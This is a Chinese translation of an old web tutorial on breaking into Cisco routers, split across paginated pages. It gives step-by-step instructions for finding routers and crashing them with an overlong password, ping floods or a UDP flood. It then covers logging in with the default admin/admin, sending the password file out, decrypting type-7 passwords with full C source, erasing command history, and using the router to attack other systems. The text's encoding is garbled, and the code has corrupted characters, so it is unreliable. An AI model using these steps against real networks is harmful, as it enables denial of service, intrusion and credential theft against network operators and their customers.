原文來自BlackSun，夢(mèng)醒時(shí)分翻譯。這是一篇非常好的文章，很高興能和大家共享！

警告：

不要用這破壞cisco系統(tǒng)，或非法訪問系統(tǒng)。這篇文章只是以學(xué)習(xí)為目的。只可以用在合法行為，不能破壞任何系統(tǒng)。這篇文章將一步一步的向你展示如何利用發(fā)現(xiàn)的缺陷來獲得非法訪問。如果你攻入了一個(gè)cisco路由器，或者擾亂了系統(tǒng)，將會(huì)中斷數(shù)百個(gè)網(wǎng)絡(luò)客戶機(jī)，造成大量損失。所以，只可以在被允許的情況下進(jìn)行，否則你將會(huì)有許多麻煩！

----------------------------------------------------------------------------------------------

目錄:

----------------------------------------------------------------------------------------------

在你看之前需要了解的:

－什么是IP地址？

－什么是ISP？

－什么是TCP/IP數(shù)據(jù)包？

－怎樣隱藏你的IP地址？

－怎樣使用Telnet？

－怎樣使用HyperTerminal？

－怎樣使用Ping？

－怎樣使用TraceRoute？

－怎樣使用代理服務(wù)器？

----------------------------------------------------------------------------------------------

－第一段：為什么攻擊cisco路由器？

－第二段：怎樣找到一個(gè)cisco路由器？

－第三段：怎樣闖入一個(gè)cisco路由器？

－第四段：怎樣破解密碼？

－第五段：怎樣使用一個(gè)cisco路由器？

----------------------------------------------------------------------------------------------

你看之前需要了解的知識(shí)：

----------------------------------------------------------------------------------------------

什么是IP地址？

IP是Internet Protocol的縮寫,電腦通過IP地址來識(shí)別網(wǎng)絡(luò)中的其它電腦，與其連接。這就是你為什么會(huì)在IRC中被踢走，并且找到你的ISP和你的大概位置。IP地址是很容易得到的，基本上可以由以下幾種方法

獲得：

-你訪問某網(wǎng)站,你的IP被記錄

-在IRC中,某人得到你的IP地址

-在ICQ，OICQ中,可以簡單的得到你的IP地址，使用一些小工具。

-如果你的電腦和某人連接起來，運(yùn)行 systat即可看到和那些電腦連接（以IP地址顯示）

-某人發(fā)給你一封用java程序?qū)懙泥]件，可以得到你的IP地址

還有其它許多方法得到IP地址，包括使用一些木馬和后門程序。

-----------

什么是ISP？

ISP是Internet Service Provider的縮寫,你通過它們連接到internet.你撥號(hào)后就會(huì)連接和其連接。我們可以運(yùn)行一個(gè)traceroute（跟蹤路徑）來尋找我們的ISP（traceroute 在后面還會(huì)介紹).

你應(yīng)該看到像這樣:

tracert 222.222.22.22

Tracing route to [221.223.24.54]

over a maximum of 30 hops.

1 147ms 122ms 132ms your.isp [222.222.22.21]<<<你的ISP

[1] [2] [3] [4] [5] [6] 下一頁  

文章錄入：csh    責(zé)任編輯：csh 

2 122ms 143ms 123ms isp.firewall [222.222.22.20]<<Preferences。你可以在這改變緩沖區(qū)的大小。

你也可以 打開/關(guān)閉 "local echo"。如果你打開了"local echo"，你的電腦將顯示你輸入的任何東西，并且連接上的電腦將顯示回應(yīng)。

所以你將會(huì)看到就像這些：

你輸入 "hello",你看到的是

hhelelollo

這是因?yàn)榉祷氐男畔⒑湍爿斎氲膬?nèi)容已經(jīng)混合起來了。我這樣做的唯一的原因是看連接的機(jī)器對(duì)我的輸入，是否產(chǎn)生回應(yīng)。

在默認(rèn)的情況下，telnet只會(huì)通過telnet端口連接，即是斷口23。你并不會(huì)只通過端口23連接，所以你連接的時(shí)候，你可以任意改變端口。你可以改成25，那是郵件服務(wù)程序的端口。也可以是21，那是ftp的端口?？偣灿猩锨€(gè)端口，所以你要選擇正確的端口！

-----------------------------------------------------------------------------------------------

怎樣使用超級(jí)終端？

超級(jí)終端可以讓你的電腦的任意端口進(jìn)行監(jiān)聽某臺(tái)電腦，如果有信息來到這個(gè)端口，就可以進(jìn)行傳輸件。超級(jí)終端在 開始>程序>附件>通訊 中，沒有的話，你可以通過控制面板中安裝。首先，你要選擇連接協(xié)議，我們選"TCP/IP Winsock"，接著輸入要連接的電腦，下面選擇端口。可以選擇Call>Wait for Call，來等待文件。這樣其它的電腦就可以通過某個(gè)端口連接上你了，你也可以聊天，或者傳送文件了。

:我的超級(jí)終端可能不一樣，沒有這個(gè)功能。

----------------------------------------------------------------------------------------------

怎樣使用Ping？

Ping的使用很簡單，在MS-DOS方式下，輸入“ping IP地址”，默認(rèn)是ping三次，你也可以自己設(shè)定。

"ping ip地址 -t"可以使其不停的ping。

改變 ping 的大小可以這樣做:"ping -l (size) ip.address"

ping其實(shí)是向遠(yuǎn)程的機(jī)器發(fā)送數(shù)據(jù)包，遠(yuǎn)程的機(jī)器接收到就會(huì)把數(shù)據(jù)包原路返回，我們可以看到這個(gè)過程的時(shí)間。時(shí)間越短，速度就越快，當(dāng)然，擁擠的時(shí)候，就會(huì)發(fā)生數(shù)據(jù)包丟失。 Ping 會(huì)減慢被ping的電腦的速度，流量過大的時(shí)候，甚至使其down機(jī)。一分鐘的ping攻擊就可以使一臺(tái)win98的電腦崩潰。(因?yàn)樗倪B接緩沖區(qū)溢出 - 連接過量，所以Windows決定休息休息了:>).ping攻擊也會(huì)占用你許多帶寬，所以你的帶寬要

比目標(biāo)機(jī)器大(除非目標(biāo)機(jī)器運(yùn)行的是Windows 98，而且你有個(gè)不錯(cuò)的貓，那么一分鐘內(nèi)，你就可以叫它下臺(tái)).

Ping攻擊對(duì)強(qiáng)壯的系統(tǒng)沒有效果。

注意: DOS's -t 選項(xiàng)不是一個(gè)ping攻擊,它只是很小的連接一下，而且中間有很多間隔。在Unix或Linux的機(jī)器中，你可以用上參數(shù) －f 進(jìn)行真正的ping攻擊。其實(shí)，如果你的分布是POSIX-compliant (POSIX -Portable Operating System Interface based on uniX)，否則那就不是真正的Unix/Linux 分布。那么如果你有個(gè) OS，稱自己既是Unix，又是Linux，那么就是有 －f 。

-----------------------------------------------------------------------------------------------

怎樣使用TraceRoute？

要跟蹤你的連接（可以觀察到目標(biāo)機(jī)器的連接路線），只要在MS-DOS方式下，輸入“tracert IP地址”。你將會(huì)看到一個(gè)電腦的目錄，就是你和目標(biāo)之間通過的機(jī)器。.

你可以用此方法確定是否存在防火墻，也可以確定某人的ISP(internet service provider)。

要確定ISP，只要看目標(biāo)機(jī)器的前一個(gè)IP地址，那就應(yīng)該是ISP的路由器。

基本上說，這就是traceroute怎樣工作－一個(gè) TCP/IP 數(shù)據(jù)包，在它的頭部有一個(gè)值(在IP的頭部。如果你不知道這是什么意思，沒關(guān)系，你接著往下看就可以了)稱作 TTL,它是Time To Live的縮寫。當(dāng)一個(gè)數(shù)據(jù)包通過路由器的時(shí)候，它的TTL值就會(huì)減少。這樣可能會(huì)使數(shù)據(jù)包在網(wǎng)絡(luò)中流竄，消耗帶寬。所以每當(dāng)一個(gè)數(shù)據(jù)包TTL值達(dá)到0的時(shí)候，它就會(huì)失效并且因?yàn)橐粋€(gè)ICMP錯(cuò)誤返回到發(fā)送者?，F(xiàn)在traceroute 先發(fā)送一個(gè)TTL值為1的數(shù)據(jù)包，那么它很快就會(huì)返回。查看ICMP錯(cuò)誤的頭部，traceroute就可以知道數(shù)據(jù)包第一步通過哪。接著就會(huì)發(fā)送TTL值為2的數(shù)據(jù)包，返回后，就是第二次通過的地方。依次下去，直到最終的目的地，就可以知道整個(gè)路徑。

上一頁  [1] [2] [3] [4] [5] [6] 下一頁  

文章錄入：csh    責(zé)任編輯：csh 

現(xiàn)在你是不是明白了呢? :-)

----------------------------------------------------------------------------------------------

怎樣使用代理服務(wù)器？

在網(wǎng)上尋找一個(gè)代理服務(wù)器，包括你需要的打開的端口的代理服務(wù)器。找到后，你可以用telnet 或hyperterminal通過代理服務(wù)器連接到另外一臺(tái)電腦上。這樣做對(duì)方的電腦就不可以確定你的IP地址。

----------------------------------------------------------------------------------------------

第一段：為什么攻擊cisco路由器？

你可能會(huì)想.. 為什么要攻擊 cisco 路由器呢?

答案就是那樣做將對(duì)闖入其它的系統(tǒng)非常有用...

Cisco路由器非常的快，在一個(gè)系統(tǒng)中，一些會(huì)是以18 T1連接。而且它們非常靈活，盡管大多數(shù)運(yùn)行telnet，但是它們可以在DoS攻擊或攻入其它系統(tǒng)時(shí)發(fā)揮作用。

它們同時(shí)還會(huì)有成千的數(shù)據(jù)包通過。但是可以被捕獲進(jìn)行譯碼...許多的cisco路由器受托于系統(tǒng)，它們可以讓你獲得其網(wǎng)絡(luò)中訪問其它電腦的確切的數(shù)量。

-----------------------------------------------------------------------------------------------

第二段：怎樣找到一個(gè)cisco路由器？

尋找一個(gè)cisco路由器可以說是以項(xiàng)簡單的任務(wù)，幾乎所有的ISP至少通過一個(gè)cisco路由器。最簡單的方法是在dos下運(yùn)行tracert，你可以跟蹤到電腦之間的許多電腦，在這之間，必有一個(gè) “cisco”這個(gè)名字。如果你發(fā)現(xiàn)了，記下它的IP地址。

:在中國未必有cisco這個(gè)名字，但是肯定有路由器的，你可以用SuperScan掃描前兩個(gè)IP地址，看哪個(gè)開2001端口（Cisco路由器管理）和23端口即是的啦！

現(xiàn)在，你有cisco路由器的位置了，但是它可能還有一個(gè)防火墻保護(hù)它，所以你要檢查一下它是否被封鎖ping連接的次數(shù)，如果有回應(yīng)，它就有可能未被封鎖。另外一種方法就是試著訪問cisco路由器的一些

端口。你用telnet即可，端口23，如果它要輸入密碼，未叫輸入用戶名，你就可能在一個(gè)防火墻。

試著找一個(gè)未受防火墻保護(hù)的路由器，因?yàn)檫@篇教程主題是路由器，不是教你怎樣通過防火墻。當(dāng)你確信找到一個(gè)好的系統(tǒng)，你應(yīng)該找一個(gè)可以使用23端口的代理服務(wù)器，這樣你的IP地址就不會(huì)被路由器記

錄下來了。:找到一臺(tái)運(yùn)行Wingate的機(jī)器即可。

-----------------------------------------------------------------------------------------------

第三段：怎樣闖入一個(gè)cisco路由器？

Cisco路由器運(yùn)行 V4.1 版本的軟件（現(xiàn)在普遍使用的），這很容易干掉。你只要通過代理服務(wù)器連接到一個(gè)cisco路由器，輸入一串很長的密碼，如：

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

現(xiàn)在開始等，cisco系統(tǒng)將會(huì)重新啟動(dòng)，可以說你已經(jīng)攻擊它，使它離線了...但是過2-10分鐘，它就會(huì)恢復(fù)，我們應(yīng)該進(jìn)入它。

如果什么都沒發(fā)生,那么它運(yùn)行的不是脆弱的軟件,你可以多試幾種DoS攻擊，比如大量的 ping.到dos下，輸入 "ping -l 56550 cisco.router.ip -t",這會(huì)起到同樣的效果.

:很有可能以上兩種方法都不行，反正是要其down機(jī)，那么試試那個(gè)攻擊yahoo的udpFlood，一定可以使其down機(jī)。一定要注意小心??！我相信你應(yīng)該知道該怎么保護(hù)自己。

上一頁  [1] [2] [3] [4] [5] [6] 下一頁  

文章錄入：csh    責(zé)任編輯：csh 

如果它被動(dòng)結(jié),就另找一個(gè)代理服務(wù)器進(jìn)行連接。并且用戶名為"admin"，密碼為"admin"，因?yàn)檫@是默認(rèn)的。

因?yàn)楫?dāng)它暫時(shí)的disabled，它將恢復(fù)到默認(rèn)狀態(tài)。

:你到我主頁，會(huì)有一篇文章包括幾乎所有的路由器的默認(rèn)用戶名和密碼。

現(xiàn)在，你已經(jīng)進(jìn)入了，你應(yīng)該獲得密碼文件！系統(tǒng)運(yùn)行不同的軟件，但大部分有個(gè)像"htl-textil"這類的提示，現(xiàn)在輸入"?"，觀看命。你會(huì)看到有很多的命令，你會(huì)發(fā)現(xiàn)一個(gè)傳送命令，用這個(gè)命令，在當(dāng)前Admin用戶的情況下，把密碼文件發(fā)送到你的電腦23端口上。但是在這之前，你要把你的超級(jí)終端設(shè)定好。你發(fā)送文件之后，超級(jí)終端將問你是否接收文件，你選擇是并保存在電腦中即可。離線. 你通過了最難的部分，下面準(zhǔn)備開始破解密碼。

-----------------------------------------------------------------------------------------------

第四段：怎樣破解密碼？

現(xiàn)在，你獲得了密碼文件，你要破解它才能繼續(xù)進(jìn)入路由器。所以你可以運(yùn)行John the Ripper之類的軟件破譯它。

這是我推薦的最簡單的方法.另一種方法是試著把它解碼。這樣做需要一個(gè)解碼軟件，使用某些解碼軟件，你還要有足夠的耐心。

這兒有一個(gè)專門為cisco路由器密碼文件解碼的軟件，你可以在Linux中編譯它:

#include

#include

char xlat[] = {

0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,

0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,

0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44

};

char pw_str1[] = "password 7 ";

char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)

char *enc_pw;

char *dec_pw;

{

unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)

return(-1);

seed = (enc_pw[0] - ?') * 10 + enc_pw[1] - ?'

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))

return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {

if(i !=2 && !(i & 1)) {

dec_pw[i / 2 - 2] = val ^ xlat[seed++];

val = 0;

}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {

val += enc_pw[i] - ?'

continue;

}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {

val += enc_pw[i] - 'A' + 10;

continue;

}

if(strlen(enc_pw) != i)

上一頁  [1] [2] [3] [4] [5] [6] 下一頁  

文章錄入：csh    責(zé)任編輯：csh 

return(-1);

}

dec_pw[++i / 2] = 0;

return(0);

}

usage()

{

fprintf(stdout, "Usage: %s -p \n", pname);

fprintf(stdout, " %s \n", pname);

return(0);

}

main(argc,argv)

int argc;

char **argv;

{

FILE *in = stdin, *out = stdout;

char line[257];

char passwd[65];

unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)

{

if(argc > 3) {

usage();

exit(1);

}

if(argv[1][0] == '-')

{

switch(argv[1][1]) {

case 'h':

usage();

break;

case 'p':

if(cdecrypt(argv[2], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

fprintf(stdout, "password: %s\n", passwd);

break;

default:

fprintf(stderr, "%s: unknow option.", pname);

}

return(0);

}

if((in = fopen(argv[1], "rt")) == NULL)

exit(1);

if(argc > 2)

if((out = fopen(argv[2], "wt")) == NULL)

exit(1);

}

while(1) {

for(i = 0; i < 256; i++) {

if((line[i] = fgetc(in)) == EOF) {

if(i)

break;

fclose(in);

fclose(out);

return(0);

上一頁  [1] [2] [3] [4] [5] [6] 下一頁  

文章錄入：csh    責(zé)任編輯：csh 

}

if(line[i] == '\r')

i--;

if(line[i] == '\n')

break;

}

pw_pos = 0;

line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))

pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))

pw_pos = strlen(pw_str2);

if(!pw_pos) {

fprintf(stdout, "%s\n", line);

continue;

}

if(cdecrypt(&line[pw_pos], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

else {

if(pw_pos == strlen(pw_str1))

fprintf(out, "%s", pw_str1);

else

fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);

}

}

}

如果你沒有使用Linux，你就只好用John the Ripper之類的軟件，帶上密碼檔，進(jìn)行暴利破解。

-----------------------------------------------------------------------------------------------

第五段：怎樣使用一個(gè)cisco路由器？

要使用它，你先必須連接到它，你可以用代理，以免你的IP地址被記下。當(dāng)你進(jìn)入的時(shí)候，如果你想關(guān)閉歷史記錄來掩蓋你的行為，你只要輸"terminal history size 0"。這樣就不會(huì)被記下什么了! 輸入 "?"來看路由器中的命令，大多數(shù)你都可以用的。

這些路由器一般都有telnet，所以你可以通過telnet連接到其它的系統(tǒng)上(比如unix boxes)，并且攻擊它們。你還可以使用ping 和 traceroute 進(jìn)行跟蹤系統(tǒng)或進(jìn)行DoS攻擊。你也可以監(jiān)聽數(shù)據(jù)包，但我不推薦這樣做，因?yàn)椴⒉皇且欢ǔ晒Γ視?huì)被發(fā)現(xiàn)....

----------------------------------------------------------------------------------------------

如果你第一次沒有攻入cisco，不要擔(dān)心...你一兩次是不可能成功的。它需要不斷的練習(xí)和超強(qiáng)的耐力。

這兒只向你將怎樣做...一定要在合法的情況下進(jìn)行?。?/P>

----摘自“安盟”

上一頁  [1] [2] [3] [4] [5] [6] 

文章錄入：csh    責(zé)任編輯：csh 

最新評(píng)論